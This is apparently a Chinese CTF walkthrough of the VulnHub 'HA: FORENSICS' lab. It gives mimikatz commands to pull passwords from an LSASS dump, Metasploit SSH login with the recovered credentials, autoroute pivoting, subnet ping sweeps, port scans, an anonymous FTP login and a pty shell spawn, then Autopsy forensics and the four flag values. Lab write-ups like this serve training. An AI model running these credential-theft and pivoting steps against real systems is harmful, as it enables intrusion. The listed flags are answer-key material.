VulnHub靶场之HA: FORENSICS
查看ip:
扫描端口,发现开放80端口与22端口,访问80端口,,
扫描目录,发现tips.txt:
下载zip,发现需要密码,访问igolder目录,发现pgp密钥信息啥的,去在线解密:
破解密码:
得到flag2:
压缩包中还存在一个lsass.DMP文件,,
放到minikatz去解一下:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
得到:
拿去解密一下:
ssh连接:
后续发现sodu不行,ifconfig发现有个docker:
切换使用msf进行ssh登录,使用其自动路由模块:
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.198.154
set username jasoos
set password Password@1
exploit
session -u 1
use post/multi/manage/autoroute
set session 2
exploit
使用ping去扫描存活主机
use post/multi/gather/ping_sweep
set session 2
set rhosts 172.17.0.0/24
exploit
扫描端口
use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set port 1-100
exploit
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
exploit
进入ftp查看文件:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ftp 172.17.0.2
anonymous
ls
cd pub
ls
get saboot.001
下载到靶机本地:
开启python -m SimpleHTTPServer
,下载文件:
使用autopsy:
先创建case:
创建案例后,需要特定主机,要求提供主机名,填好名称后,单击“添加主机”继续
创建主机后,要求我们添加一个图像文件:
下一步,设置为默认值,然后单击“添加”:
分析:
查看文件:
打开flag:
打开creds:
base64解密:
切换另一个用户:
总共四个flag,还差一个,图片隐写:
全部:
flag1:Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}
flag2:Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}
flag3:Flag:3 {8442460f48338fe60a9497b8e0e9022f}
flag4:Flag: {9440aee508b6215995219c58c8ba4b45}